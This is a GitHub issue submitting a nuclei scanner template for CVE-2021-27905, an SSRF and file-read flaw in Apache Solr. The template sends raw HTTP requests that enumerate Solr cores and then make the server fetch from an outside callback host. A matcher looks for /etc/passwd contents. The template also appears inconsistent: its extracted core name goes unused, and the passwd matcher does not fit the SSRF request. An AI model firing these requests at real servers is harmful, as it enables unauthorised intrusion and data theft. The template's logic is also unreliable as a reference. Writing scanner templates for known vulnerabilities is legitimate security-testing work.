### ISSUE TITLE
CVE-2021-27905.yaml

### ISSUE THREAD

**Issue by shifa123** [projectdiscovery/nuclei-templates#1342]
**Apache Solr <= 8.8.1 SSRF & Arbitrary File Read **

```yaml

id: CVE-2021-27905

info:
  name: Apache Solr <= 8.8.1 SSRF & Arbitrary File Read
  author: hackergautam
  severity: high
  tags: cve2021-27905,apache solr, ssrf solr
  reference: |
      - https://twitter.com/Al1ex4/status/1382981479727128580
      - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
      - https://nvd.nist.gov/vuln/detail/CVE-2021-27905

requests:
  - raw:
      - |
        GET /solr/admin/cores?wt=json HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Connection: close

      - |
        GET /solr/%7Bcore%7D/replication/?command=fetchindex&masterUrl=https://bugbounty.requestcatcher.com/ssrf HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Connection: close

    extractors:
      - type: regex
        regex:
          - '"status"\:\{"(.*?)"\:\{"name"'
        name: collection
        group: 1
        internal: true

    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body
```

<img width="936" alt="Screenshot 2021-04-23 at 2 45 37 PM" src="https://user-images.githubusercontent.com/18241082/115849529-93d5ef00-a442-11eb-89f5-21de2cf1b674.png">
